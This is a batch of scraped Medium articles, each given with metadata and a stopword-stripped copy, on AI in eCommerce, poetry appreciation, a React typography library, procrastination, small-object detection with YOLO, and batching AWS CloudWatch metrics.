that product. In practice, this personalization helps deliver images of related products, enticing offers related to the product, alerts related to that product, and dynamic content that alters according to demand and supply. AI engines such as Boomtrain acts as a bolt-on with your existing customer channels and helps businesses analyze how customers are interacting online. It also provides a unified view across all devices, monitoring and analyzing performances across different platforms. Companies like Criteo, are assisting Internet retailers to serve personalized online display advertisements to consumers who have previously visited the advertiser’s website. Through cross-device advertising, they are able to engage shoppers wherever they are online with premium-placed ads across desktop, mobile and social. AI is assisting in generating deep and relevant insights of data by analyzing and scanning through terabytes of data to efficiently predict human behavior. This scale of intelligence helps deliver a personalized shopping experience for the end-user. 3. Curbing Fake Reviews There’s a massive insurgence of fake reviews aimed at tarnishing the ratings of a good product. These reviews not only makes good products rank below but also cost companies billions of dollar. These stats are absolutely insane! Customer reviews are an integral part of the sales cycle. 87% of customers trust what they read without the blink of an eyelid. The last couple of years have seen a surge in talks around this subject and has consequently impacted the way customer perceive the information they encounter online, even if it is ostensibly written by a credible source. Artificial Intelligence is increasingly being deployed to analyze user reviews. For instance, Yelp has deployed a sentiment analysis technique to classify their review ratings. Through this technique, they organize the information into different data sets like business_id (ID of the business being reviewed), date (Day the review was posted), review_id (ID for the published review), stars (1–5 rating for the business), text (Review text), etc. On similar lines, Facebook has come up with its AI solution “fastText” for text classification and create supervised as well as unsupervised learning algorithms to obtain vector representation for words. 4. Sales Forecasting Earlier only God or Charles Xavier could have read your mind — but now — AI can too! Try and fathom an alternate reality where all your marketing efforts and expenditures are targeted only where the customer is likely to make a purchase. Your conversion rate will be at an all-time high, and you won’t waste your capital on customers who won’t buy. Being able to foretell how much of a given product will sell by a specific date will enable shop owners to stack up on inventory more efficiently, and simultaneously eliminate large sums of undesired cost. It is especially valuable for industries dealing with perishable products, which include not only groceries but also tickets of concert and transportation — anything that costs money when unsold. Also Read: How to build an awesome Ecommerce App Sounds too good to be true, right? AI solutions can gather historical data about past purchases and help your sales team better derive conclusions and make decisions. Besides, you won’t even need to sell your arms and legs to afford this either as these solutions are easily deployable, even by organizations with smaller budgets. Employing AI, businesses were able to derive relevant conclusions like – Suggesting products that should be promoted on a particular date Identify popular products that are making good sales Predicting what customers are likely to purchase in advance Determining the highest price a customer will pay for your product Targeted promotions Reduce fraud Improve supply chain management Enhance business intelligence Make the most money on your sales 5. Chatbots to the Rescue It might be so hard for you to feel special amongst an ocean of 7 Billion, right? Well, eCommerce websites are adopting chatbots to make you feel special. Companies are increasingly deploying chatbots to improve customer service & satisfaction. Go ahead and browse any ecommerce site, a little chatbox will pop-up asking you what you want to make a purchase of. Once you enter your requirements, you get filtered results specific to your taste. Let us list some benefits of deploying chatbots: Chatbots have increased customer conversion tremendously by reducing the labor for lazy buyers . . We have come so far from the time when chatbots offered just customary replies. Now they have become intelligent beings who understand and tackle a range of issues that they were earlier incapable of. who understand and tackle a range of issues that they were earlier incapable of. It is vital to provide real-time support to online shoppers as a recent study found that almost 83% of online shoppers need assistance while shopping and chatbots make it possible to provide real-time support. while shopping and chatbots make it possible to provide real-time support. Chatbots also provide a more personalized experience for consumers. Compared with social media, chatbots can make conversations more interactive and engaging. They increase the sales figures by up to 40%. for consumers. Compared with social media, chatbots can make conversations more interactive and engaging. They increase the sales figures by up to 40%. Deploying chatbots helps to collect feedback more efficiently. Additionally, it can make it easier to track purchasing patterns and consumer behavior. Chatbots can provide efficiency, that too at an affordable price. Live support can be quite costly with limited work hours. Chatbots automate the process and can operate 24/7. Chatbots are gaining ground. Apart from potentially changing the industry, implementing a chatbot can be a good marketing campaign. Any company that wants to stay ahead in the race needs to follow this trend. Discover Latest Jobs in Bots, NLP, AI, ML, NLU & More
https://medium.com/gobeyond-ai/top-5-use-cases-of-ai-in-ecommerce-88c9b8d58bc7
['Mayank Pratap']
2020-02-24 13:11:46.912000+00:00
['AI', 'Artificial Intelligence', 'Ai Development', 'Ai In Ecommerce', 'Ecommerce']
Title Top 5 Use Cases AI eCommerceContent Apple introduced first iPhone — literally shift paradigm always viewed phone Since several significant evolution technology nothing compare biggest — Artificial Intelligence Don’t agree AI bearing almost every conceivable thing suppose don’t even need elucidate broad application incredible new domain Naturally time benefit AI implicated lucrative business 21st Century — eCommerce Almost every significant step commerce internet transformed implementing AI Every significant step like Visiting retailer’s website adding product cart Placing order even Checkout automated using capability AI article would try shed light practical significant usecases AI eCommerce eCommerce business leverage moment time seems lot conundrum subject AI eCommerce let’s put end discussion shall 5 UseCases AI eCommerce 1 Better Search Results observed customer end abandoning purchase often product result displayed turn irrelevant AI organization trying display customercentric search result relevant desired ask eCommerce website increasingly leveraging NLP Natural Language Processing Image Recognition better comprehend user language produce better product result Trending GoBeyondai article 2 Strategies Best Practices Managing ECommerce Customer Service 3 Top 15 Magento 2 Extensions ECommerce Site 4 Free Influencers Took Brand Global Success Yandex popular search engine successfully implemented advanced application NLP Deep Learning optimize future search help data previous search turned massive success able increase clickthrough rate almost ten percent Clarifai trying improve ecommerce building smarter application see world people would word “Artificial Intelligence Vision” application enable developer build intelligent apps time empower business providing customercentric experience demonstration Pinterest Lens work Pinterest partnering ecommerce store new offering Pinterest Lens find matching item store directly image Pinterest great standpoint people generally abandon search aren’t able find relevant product Developments helping business generate better revenue also reducing customers’ journey Recommended Read 5 Tips Ensure Impeccable Security eCommerce Business 2 Shopping Experience Level 1001 enhance user’s shopping experience Make real possible want understand much Google know go check Google Maps Timeline device use collect store ton information data extremely valuable right type information enrich improve shopping experience Deep Learning Machine Learning technology able utilize smallest piece data instance even hover made product analyzed evaluated understand likelihood buying product practice personalization help deliver image related product enticing offer related product alert related product dynamic content alters according demand supply AI engine Boomtrain act bolton existing customer channel help business analyze customer interacting online also provides unified view across device monitoring analyzing performance across different platform Companies like Criteo assisting Internet retailer serve personalized online display advertisement consumer previously visited advertiser’s website crossdevice advertising able engage shopper wherever online premiumplaced ad across desktop mobile social AI assisting generating deep relevant insight data analyzing scanning terabyte data efficiently predict human behavior scale intelligence help deliver personalized shopping experience enduser 3 Curbing Fake Reviews There’s massive insurgence fake review aimed tarnishing rating good product review make good product rank also cost company billion dollar stats absolutely insane Customer review integral part sale cycle 87 customer trust read without blink eyelid last couple year seen surge talk around subject consequently impacted way customer perceive information encounter online even ostensibly written credible source Artificial Intelligence increasingly deployed analyze user review instance Yelp deployed sentiment analysis technique classify review rating technique organize information different data set like businessid ID business reviewed date Day review posted reviewid ID published review star 1–5 rating business text Review text etc similar line Facebook come AI solution “fastText” text classification create supervised well unsupervised learning algorithm obtain vector representation word 4 Sales Forecasting Earlier God Charles Xavier could read mind — — AI Try fathom alternate reality marketing effort expenditure targeted customer likely make purchase conversion rate alltime high won’t waste capital customer won’t buy able foretell much given product sell specific date enable shop owner stack inventory efficiently simultaneously eliminate large sum undesired cost especially valuable industry dealing perishable product include grocery also ticket concert transportation — anything cost money unsold Also Read build awesome Ecommerce App Sounds good true right AI solution gather historical data past purchase help sale team better derive conclusion make decision Besides won’t even need sell arm leg afford either solution easily deployable even organization smaller budget Employing AI business able derive relevant conclusion like – Suggesting product promoted particular date Identify popular product making good sale Predicting customer likely purchase advance Determining highest price customer pay product Targeted promotion Reduce fraud Improve supply chain management Enhance business intelligence Make money sale 5 Chatbots Rescue might hard feel special amongst ocean 7 Billion right Well eCommerce website adopting chatbots make feel special Companies increasingly deploying chatbots improve customer service satisfaction Go ahead browse ecommerce site little chatbox popup asking want make purchase enter requirement get filtered result specific taste Let u list benefit deploying chatbots Chatbots increased customer conversion tremendously reducing labor lazy buyer come far time chatbots offered customary reply become intelligent being understand tackle range issue earlier incapable understand tackle range issue earlier incapable vital provide realtime support online shopper recent study found almost 83 online shopper need assistance shopping chatbots make possible provide realtime support shopping chatbots make possible provide realtime support Chatbots also provide personalized experience consumer Compared social medium chatbots make conversation interactive engaging increase sale figure 40 consumer Compared social medium chatbots make conversation interactive engaging increase sale figure 40 Deploying chatbots help collect feedback efficiently Additionally make easier track purchasing pattern consumer behavior Chatbots provide efficiency affordable price Live support quite costly limited work hour Chatbots automate process operate 247 Chatbots gaining ground Apart potentially changing industry implementing chatbot good marketing campaign company want stay ahead race need follow trend Discover Latest Jobs Bots NLP AI ML NLU MoreTags AI Artificial Intelligence Ai Development Ai Ecommerce Ecommerce
3,895
The Tragedy Of Poetry Appreciation
A poetry appreciation class is to poems, what applesauce is to apples. We eat applesauce at room temperature, no chewing required, and in a mouth that breeds sadness. Similarly, we teach poetry appreciation in tame, extra-credit, cage-like places where eyes dart for the clock, pleading how much longer? Applesauce is a consolation prize. It is a bland, formless, disappointing mush that they once served, small white bowls with thin green stripes around the edges in elementary schools. To be clear, apples themselves are delightful, delicious, succulent gifts from the happiest gods. They include thousands of varieties. My taste buds dance the Bossa nova in anticipation of sinking my teeth into one of those magnificent manifestations of nature’s bounty. But let’s talk about poems, how those little engines of magic, pump their ideas, feelings, and wisdom deep into broken hearts and souls’ infrastructure. Let’s talk about how even well-meaning poetry appreciation classes strain the muscle, fiber, and power from poetry. Striping away its lightning, its rolling thunder, its winds and storms and aching hearts. Why can’t we just let poetry appreciation simply slip away like applesauce? It may still exist in a faraway tepid and tasteless cafeteria, but thanks to a merciful God, we no longer have to eat it.
https://medium.com/literally-literary/the-tragedy-of-poetry-appreciation-39ba085b7f32
['Dale Biron']
2020-09-25 05:32:57.058000+00:00
['Creativity', 'Writing', 'Poetry']
Title Tragedy Poetry AppreciationContent poetry appreciation class poem applesauce apple eat applesauce room temperature chewing required mouth breed sadness Similarly teach poetry appreciation tame extracredit cagelike place eye dart clock pleading much longer Applesauce consolation prize bland formless disappointing mush served small white bowl thin green stripe around edge elementary school clear apple delightful delicious succulent gift happiest god include thousand variety taste bud dance Bossa nova anticipation sinking teeth one magnificent manifestation nature’s bounty let’s talk poem little engine magic pump idea feeling wisdom deep broken heart souls’ infrastructure Let’s talk even wellmeaning poetry appreciation class strain muscle fiber power poetry Striping away lightning rolling thunder wind storm aching heart can’t let poetry appreciation simply slip away like applesauce may still exist faraway tepid tasteless cafeteria thanks merciful God longer eat itTags Creativity Writing Poetry
3,896
How I Built Grotesk, a React Component (and CSS Library) That Makes Web Type Simple
How I Built Grotesk, a React Component (and CSS Library) That Makes Web Type Simple Typography styles, simplified What’s Grotesk? Grotesk is a CSS library and React component that aims to make web typography simple. The reason I built it is because I’ve noticed I start almost every static website off with the same set of themes or typographic rules, so I decided to build a tiny library I can just plug into my next project easily. Since I mostly only work on React applications and plain ol’ static websites, I made a React component and a CSS library.
https://medium.com/better-programming/how-i-built-grotesk-a-react-component-and-css-library-that-makes-web-type-simple-a84b832aeb00
['Kartik Nair']
2020-03-03 06:34:42.647000+00:00
['CSS', 'Programming', 'Design', 'React', 'JavaScript']
Title Built Grotesk React Component CSS Library Makes Web Type SimpleContent Built Grotesk React Component CSS Library Makes Web Type Simple Typography style simplified What’s Grotesk Grotesk CSS library React component aim make web typography simple reason built I’ve noticed start almost every static website set theme typographic rule decided build tiny library plug next project easily Since mostly work React application plain ol’ static website made React component CSS libraryTags CSS Programming Design React JavaScript
3,897
Focus on Having a Good Time to Beat Your Procrastination
Focus on Having a Good Time to Beat Your Procrastination Focusing on micro-managing our time, just creates more boring chores to procrastinate over! Photo by Marcin Dampc from Pexels Procrastination has been my archenemy for at least 2 decades, and it has led to problems in work, in my relationships, and in life in general. It took me years of research and trying different approaches to eventually solve my procrastination problem. Most people find focusing on micro-managing their time is an important element in beating their procrastination. However, it does present two additional problems to the serial procrastinator. First, you have to beat your procrastination long enough to put the methods into action. Second, these methods are extra chores that your brain will procrastinate over. After spending years trying to manage my procrastination, I looked at the root causes of my procrastination and the reasoning behind them. By addressing what I found and managing my periods of procrastination, I could master my procrastination. Why Do We Procrastinate? Photo by Pixabay from Pexels Most of us procrastinate because our subconscious brain is rebelling in some form or another. Your brain could be rebelling against; Deadlines, including ones you have set yourself. (Your brain doesn’t like anything that holds authority over it or limits its choices). Things it doesn’t enjoy doing. Things it does not find stimulating enough. Not doing something it enjoys, or it thinks is more important. Other people will have other reasons for their brain rebelling and procrastinating but rarely is procrastination just laziness. The one common thing that runs through all the reasons is that your brain craves a better quality of life for itself. So, it simply rebels against anything that gets in its way of a better quality of life. It rebels against meeting that deadline. It rebels against doing things it doesn’t like. It rebels against anything that stops it from getting an instant hit of fun. Your brain is sulking like a naughty toddler who doesn’t get its way. For a more in-depth look at this phenomenon, I recommend reading the Chimp Paradox by Dr. Steve Peters. In short, your brain is simply seeking a better quality of life and wants to ignore anything that gets in its way. The Endless Procrastination Cycle Procrastination can become an endless cycle that gets harder to break the longer it goes on. Now a lot of us are working from home, we find procrastination is an easy trap to fall into. After all, no one can see if you are working or not. So, to make up for our procrastination, we work a bit longer than normal. Then we spend our evenings stressing about what we didn’t achieve during the day and how we will catch up in the morning. Eventually, the worry will start keeping you up at night. Before you know it, all of your quality time has been eaten up by work and stress. The tasks you procrastinated over now occupy your mind when you should be spending quality time with your friends and family. It keeps you awake at night and your brain’s quality of life declines further and further. The more your brain’s quality of life declines, the more it will find things to procrastinate over while it seeks a better quality of life. And so, the cycle continues downwards. Play Hard, Then Work Hard Photo by Vincent Gerbouin from Pexels So, I looked for ways of improving my brain’s quality of life and immediately ran into a problem. My brain is conditioned to believe that rewards come after hard work, and not before. So, my first plan was to promise myself treats if I completed a task. For the brains of non-procrastinators, this works really well. Unfortunately, the brains of procrastinators don’t normally work that way. They want the rewards now. My mind instantly rebelled against working for treats and started procrastinating again. It didn’t care what the size of my promised reward was, my brain kept on procrastinating because it wanted a better quality of life now, not later. So, I flipped things on their head and just took all the rewards I promised myself, regardless of any tasks I had completed or not. I made a conscious effort to fill my spare time with quality activities including; Spending quality time with my family and grandchildren Playing video games (something I have loved since the 80s) Country walks DIY / Gardening projects Learning to cook Blasting out my favorite tunes Binge-watching TV shows and films I also made other quality of life adjustments, such as removing my works email and messaging software off my phone. And I banned my phone from the bedroom and replaced it with a traditional alarm clock. This greatly limited how much my work life invaded my spare time and my quality of life. By filling my spare time with these quality activities, I achieved two things. First, I improved my brain’s quality of life by giving it what it craved. Second, I starved my brain of time to stress over my procrastination stopping the endless procrastination cycle. The first two weeks were hard, as I had to overcome decades of unhealthy habits. The biggest of which was a tendency to think work always came above and before everything else in life. The results were amazing. After the initial two weeks of setting up better habits, it only took a week or two for my procrastination at work to drop. Then my ability to study improved, and finally my relationships improved. 6 months later my procrastination is all but gone. Like most people, I still have tasks I hate doing and I drag my feet over them, but now they are manageable with simple time management techniques. With my brain experiencing a better quality of life, my time micro-management techniques stop being an extra chore to procrastinate over. Instead, they became more powerful and easier to implement and maintain. The Takeaways Photo by Blu Byrd from Pexels For most people, there is a lot to be said for the phrase “Work hard, play hard”, however, for procrastinators it is backward. We need to play hard and then work hard. If you use techniques to micro-manage your procrastination periods, hold on to them — they will play an even bigger role in the future. Improving your brain’s quality of life will make them as powerful as you initially hoped they would be. By improving your brain’s quality of life, you remove the primary reason for your brain to procrastinate over chores. Time micro-management techniques will still help make more effective use of your time and get through those times when your brain sulks for no apparent reason.
https://medium.com/swlh/focus-on-having-a-good-time-to-beat-your-procrastination-8660c0bb34c4
['Sammy Jones']
2020-12-19 22:20:25.567000+00:00
['Management', 'Life Lessons', 'Startup', 'Entrepreneurship', 'Business']
Title Focus Good Time Beat ProcrastinationContent Focus Good Time Beat Procrastination Focusing micromanaging time creates boring chore procrastinate Photo Marcin Dampc Pexels Procrastination archenemy least 2 decade led problem work relationship life general took year research trying different approach eventually solve procrastination problem people find focusing micromanaging time important element beating procrastination However present two additional problem serial procrastinator First beat procrastination long enough put method action Second method extra chore brain procrastinate spending year trying manage procrastination looked root cause procrastination reasoning behind addressing found managing period procrastination could master procrastination Procrastinate Photo Pixabay Pexels u procrastinate subconscious brain rebelling form another brain could rebelling Deadlines including one set brain doesn’t like anything hold authority limit choice Things doesn’t enjoy Things find stimulating enough something enjoys think important people reason brain rebelling procrastinating rarely procrastination laziness one common thing run reason brain craves better quality life simply rebel anything get way better quality life rebel meeting deadline rebel thing doesn’t like rebel anything stop getting instant hit fun brain sulking like naughty toddler doesn’t get way indepth look phenomenon recommend reading Chimp Paradox Dr Steve Peters short brain simply seeking better quality life want ignore anything get way Endless Procrastination Cycle Procrastination become endless cycle get harder break longer go lot u working home find procrastination easy trap fall one see working make procrastination work bit longer normal spend evening stressing didn’t achieve day catch morning Eventually worry start keeping night know quality time eaten work stress task procrastinated occupy mind spending quality time friend family keep awake night brain’s quality life decline brain’s quality life decline find thing procrastinate seek better quality life cycle continues downwards Play Hard Work Hard Photo Vincent Gerbouin Pexels looked way improving brain’s quality life immediately ran problem brain conditioned believe reward come hard work first plan promise treat completed task brain nonprocrastinators work really well Unfortunately brain procrastinator don’t normally work way want reward mind instantly rebelled working treat started procrastinating didn’t care size promised reward brain kept procrastinating wanted better quality life later flipped thing head took reward promised regardless task completed made conscious effort fill spare time quality activity including Spending quality time family grandchild Playing video game something loved since 80 Country walk DIY Gardening project Learning cook Blasting favorite tune Bingewatching TV show film also made quality life adjustment removing work email messaging software phone banned phone bedroom replaced traditional alarm clock greatly limited much work life invaded spare time quality life filling spare time quality activity achieved two thing First improved brain’s quality life giving craved Second starved brain time stress procrastination stopping endless procrastination cycle first two week hard overcome decade unhealthy habit biggest tendency think work always came everything else life result amazing initial two week setting better habit took week two procrastination work drop ability study improved finally relationship improved 6 month later procrastination gone Like people still task hate drag foot manageable simple time management technique brain experiencing better quality life time micromanagement technique stop extra chore procrastinate Instead became powerful easier implement maintain Takeaways Photo Blu Byrd Pexels people lot said phrase “Work hard play hard” however procrastinator backward need play hard work hard use technique micromanage procrastination period hold — play even bigger role future Improving brain’s quality life make powerful initially hoped would improving brain’s quality life remove primary reason brain procrastinate chore Time micromanagement technique still help make effective use time get time brain sulk apparent reasonTags Management Life Lessons Startup Entrepreneurship Business
3,898
Tackling the Small Object Problem in Object Detection
Tackling the Small Object Problem in Object Detection Note: we have also published Tackling the Small Object Problem on our blog. Detecting small objects is one of the most challenging and important problems in computer vision. In this post, we will discuss some of the strategies we have developed at Roboflow by iterating on hundreds of small object detection models. Small objects as seen from above by drone in the public aerial maritime dataset To improve your model’s performance on small objects, we recommend the following techniques: If you prefer video, I have also recorded a discussion of this post Why is the Small Object Problem Hard? The small object problem plagues object detection models worldwide. Not buying it? Check the COCO evaluation results for recent state of the art models YOLOv3, EfficientDet, and YOLOv4: Check out AP_S, AP_M, AP_L for state of the art models. Small objects are hard! (cite) In EfficientDet for example, AP on small objects is only 12%, held up against an AP of 51% for large objects. That is almost a five fold difference! So why is detecting small objects so hard? It all comes down to the model. Object detection models form features by aggregating pixels in convolutional layers. Feature aggregation for object detection in PP-YOLO And at the end of the network a prediction is made based on a loss function, which sums up across pixels based on the difference between prediction and ground truth. The loss function in YOLO If the ground truth box is not large, the signal will small while training is occurring. Furthermore, small objects are most likely to have data labeling errors, where their identification may be omitted. Empirically and theoretically, small objects are hard. Increasing your image capture resolution Resolution, resolution, resolution… it is all about resolution. Very small objects may contain only a few pixels within the bounding box — meaning it is very important to increase the resolution of your images to increase the richness of features that your detector can form from that small box. Therefore, we suggest capturing as high of resolution images as possible, if possible. Increasing your model’s input resolution Once you have your images at higher resolution, you can scale up your model’s input resolution. Warning: this will result in a large model that takes longer to train, and will be slower to infer when you start deployment. You may have to run experiments to find out the right tradeoff of speed with performance. You can easily scale your input resolution in our tutorial on training YOLOv4 by changing image size in the config file. [net] batch=64 subdivisions=36 width={YOUR RESOLUTION WIDTH HERE} height={YOUR RESOLUTION HEIGHT HERE} channels=3 momentum=0.949 decay=0.0005 angle=0 saturation = 1.5 exposure = 1.5 hue = .1 learning_rate=0.001 burn_in=1000 max_batches=6000 policy=steps steps=4800.0,5400.0 scales=.1,.1 You can also easily scale your input resolution in our tutorial on how to train YOLOv5 by changing the image size parameter in the training command: !python train.py --img {YOUR RESOLUTON SIZE HERE} --batch 16 --epochs 10 --data '../data.yaml' --cfg ./models/custom_yolov5s.yaml --weights '' --name yolov5s_results --cache Note: you will only see improved results up to the maximum resolution of your training data. Tiling your images Another great tactic for detecting small images is to tile your images as a preprocessing step. Tiling effectively zooms your detector in on small objects, but allows you to keep the small input resolution you need in order to be able to run fast inference. Tiling images as a preprocessing step in Roboflow If you use tiling during training, it is important to remember that you will also need to tile your images at inference time. Generating More Data Via Augmentation Data augmentation generates new images from your base dataset. This can be very useful to prevent your model from overfitting to the training set. Some especially useful augmentations for small object detection include random crop, random rotation, and mosaic augmentation. Auto Learning Model Anchors Anchor boxes are prototypical bounding boxes that your model learns to predict in relation to. That said, anchor boxes can be preset and sometime suboptimal for your training data. It is good to custom tune these to your task at hand. Thankfully, the YOLOv5 model architecture does this for you automatically based on your custom data. All you have to do is kick off training. Analyzing anchors... anchors/target = 4.66, Best Possible Recall (BPR) = 0.9675. Attempting to generate improved anchors, please wait... WARNING: Extremely small objects found. 35 of 1664 labels are < 3 pixels in width or height. Running kmeans for 9 anchors on 1664 points... thr=0.25: 0.9477 best possible recall, 4.95 anchors past thr n=9, img_size=416, metric_all=0.317/0.665-mean/best, past_thr=0.465-mean: 18,24, 65,37, 35,68, 46,135, 152,54, 99,109, 66,218, 220,128, 169,228 Evolving anchors with Genetic Algorithm: fitness = 0.6825: 100%|██████████| 1000/1000 [00:00<00:00, 1081.71it/s] thr=0.25: 0.9627 best possible recall, 5.32 anchors past thr n=9, img_size=416, metric_all=0.338/0.688-mean/best, past_thr=0.476-mean: 13,20, 41,32, 26,55, 46,72, 122,57, 86,102, 58,152, 161,120, 165,204 Filtering Out Extraneous Classes Class management is an important technique to improve the quality of your dataset. If you have one class that is significantly overlapping with another class, you should filter this class from your dataset. And perhaps, you decide that the small object in your dataset is not worth detecting, so you may want to take it out. You can quickly identify all of these issues with the Advanced Dataset Health Check that is a part of Roboflow Pro. Class omission and class renaming are all possible through Roboflow’s ontology management tools. Conclusion Properly detecting small objects is truly a challenge. In this post, we have discussed a few strategies for improving your small object detector, namely: As always, happy detecting!
https://towardsdatascience.com/tackling-the-small-object-problem-in-object-detection-6e1c9976ee69
['Jacob Solawetz']
2020-10-12 14:31:18.087000+00:00
['Artificial Intelligence', 'Data Science', 'Object Detection', 'Computer Vision', 'Deep Learning']
Title Tackling Small Object Problem Object DetectionContent Tackling Small Object Problem Object Detection Note also published Tackling Small Object Problem blog Detecting small object one challenging important problem computer vision post discus strategy developed Roboflow iterating hundred small object detection model Small object seen drone public aerial maritime dataset improve model’s performance small object recommend following technique prefer video also recorded discussion post Small Object Problem Hard small object problem plague object detection model worldwide buying Check COCO evaluation result recent state art model YOLOv3 EfficientDet YOLOv4 Check APS APM APL state art model Small object hard cite EfficientDet example AP small object 12 held AP 51 large object almost five fold difference detecting small object hard come model Object detection model form feature aggregating pixel convolutional layer Feature aggregation object detection PPYOLO end network prediction made based loss function sum across pixel based difference prediction ground truth loss function YOLO ground truth box large signal small training occurring Furthermore small object likely data labeling error identification may omitted Empirically theoretically small object hard Increasing image capture resolution Resolution resolution resolution… resolution small object may contain pixel within bounding box — meaning important increase resolution image increase richness feature detector form small box Therefore suggest capturing high resolution image possible possible Increasing model’s input resolution image higher resolution scale model’s input resolution Warning result large model take longer train slower infer start deployment may run experiment find right tradeoff speed performance easily scale input resolution tutorial training YOLOv4 changing image size config file net batch64 subdivisions36 widthYOUR RESOLUTION WIDTH heightYOUR RESOLUTION HEIGHT channels3 momentum0949 decay00005 angle0 saturation 15 exposure 15 hue 1 learningrate0001 burnin1000 maxbatches6000 policysteps steps4800054000 scales11 also easily scale input resolution tutorial train YOLOv5 changing image size parameter training command python trainpy img RESOLUTON SIZE batch 16 epoch 10 data datayaml cfg modelscustomyolov5syaml weight name yolov5sresults cache Note see improved result maximum resolution training data Tiling image Another great tactic detecting small image tile image preprocessing step Tiling effectively zoom detector small object allows keep small input resolution need order able run fast inference Tiling image preprocessing step Roboflow use tiling training important remember also need tile image inference time Generating Data Via Augmentation Data augmentation generates new image base dataset useful prevent model overfitting training set especially useful augmentation small object detection include random crop random rotation mosaic augmentation Auto Learning Model Anchors Anchor box prototypical bounding box model learns predict relation said anchor box preset sometime suboptimal training data good custom tune task hand Thankfully YOLOv5 model architecture automatically based custom data kick training Analyzing anchor anchorstarget 466 Best Possible Recall BPR 09675 Attempting generate improved anchor please wait WARNING Extremely small object found 35 1664 label 3 pixel width height Running kmeans 9 anchor 1664 point thr025 09477 best possible recall 495 anchor past thr n9 imgsize416 metricall03170665meanbest pastthr0465mean 1824 6537 3568 46135 15254 99109 66218 220128 169228 Evolving anchor Genetic Algorithm fitness 06825 100██████████ 10001000 00000000 108171its thr025 09627 best possible recall 532 anchor past thr n9 imgsize416 metricall03380688meanbest pastthr0476mean 1320 4132 2655 4672 12257 86102 58152 161120 165204 Filtering Extraneous Classes Class management important technique improve quality dataset one class significantly overlapping another class filter class dataset perhaps decide small object dataset worth detecting may want take quickly identify issue Advanced Dataset Health Check part Roboflow Pro Class omission class renaming possible Roboflow’s ontology management tool Conclusion Properly detecting small object truly challenge post discussed strategy improving small object detector namely always happy detectingTags Artificial Intelligence Data Science Object Detection Computer Vision Deep Learning
3,899
Benchmarking API Endpoints With TypeScript Decorators
Publishing CloudWatch Metrics With the API set up, I want it to send metrics to CloudWatch so we can use it later. But first, I will quickly go through some basic CloudWatch concepts if you’ve never used them before. If you want to dive more into it, I found this post by Mathew Kenny Thomas which explains each concept in more detail. CloudWatch is a monitoring service offered by AWS. There are namespaces in CloudWatch that serve as containers for the metrics that we publish. Usually, each application publishes metrics with a unique namespace within an organization. You can think of these metrics as sets of data representing the value of a variable over time. For example, this variable can be the CPU usage of an EC2 instance and the data points represent the percentage utilization of CPU over time. You can also define your own custom metrics and publish them to CloudWatch, and then you can retrieve statistics about them by creating a dashboard. That’s what we will be doing here. I created a utility class for it: A metric in CloudWatch has dimensions, which are name/value pairs that are part of the identity of a metric. We can associate a maximum of ten dimensions to a metric. On line 34, I added a dimension to indicate the environment of the API, to distinguish testing metrics from production. In addition, a metric has properties like the metric name, the value, and the unit of the data point. This type is defined by MetricData type on line 3. The _metricsQueue is used to batch metrics together to reduce AWS request calls. Each API call to use putMetricData costs money, and we can avoid that cost if we send multiple metrics in one go. Luckily, this method allows us to do that. The parameter of putMetricData is as follows: MetricData.member.N The data for the metric. The array can include no more than 20 metrics per call. This means the MetricData parameter that we pass into putMetricData can be an array of metrics, and each item has the type MetricData . So our class maintains a queue that stores up to ten metrics. When the queue is full, we publish all of them at once with namespace My API on line 57. We return the promise of the sdk call and let the controller handle the result. This is a very simple implementation of batching, but there is a more powerful library to handle this if you are looking to save some AWS costs. Mixmax made a blogpost showing how they saved a decent amount of operating cost by batching up metrics: “Batching CloudWatch metrics.” Now we have a utility that publishes metrics to CloudWatch, let’s see how we can use it inside a TypeScript decorator.
https://medium.com/better-programming/benchmarking-api-endpoints-with-typescript-decorators-27cd462be488
['Michael Chi']
2020-11-03 19:03:04.318000+00:00
['JavaScript', 'Web Development', 'Typescript', 'AWS', 'Programming']
Title Benchmarking API Endpoints TypeScript DecoratorsContent Publishing CloudWatch Metrics API set want send metric CloudWatch use later first quickly go basic CloudWatch concept you’ve never used want dive found post Mathew Kenny Thomas explains concept detail CloudWatch monitoring service offered AWS namespaces CloudWatch serve container metric publish Usually application publishes metric unique namespace within organization think metric set data representing value variable time example variable CPU usage EC2 instance data point represent percentage utilization CPU time also define custom metric publish CloudWatch retrieve statistic creating dashboard That’s created utility class metric CloudWatch dimension namevalue pair part identity metric associate maximum ten dimension metric line 34 added dimension indicate environment API distinguish testing metric production addition metric property like metric name value unit data point type defined MetricData type line 3 metricsQueue used batch metric together reduce AWS request call API call use putMetricData cost money avoid cost send multiple metric one go Luckily method allows u parameter putMetricData follows MetricDatamemberN data metric array include 20 metric per call mean MetricData parameter pas putMetricData array metric item type MetricData class maintains queue store ten metric queue full publish namespace API line 57 return promise sdk call let controller handle result simple implementation batching powerful library handle looking save AWS cost Mixmax made blogpost showing saved decent amount operating cost batching metric “Batching CloudWatch metrics” utility publishes metric CloudWatch let’s see use inside TypeScript decoratorTags JavaScript Web Development Typescript AWS Programming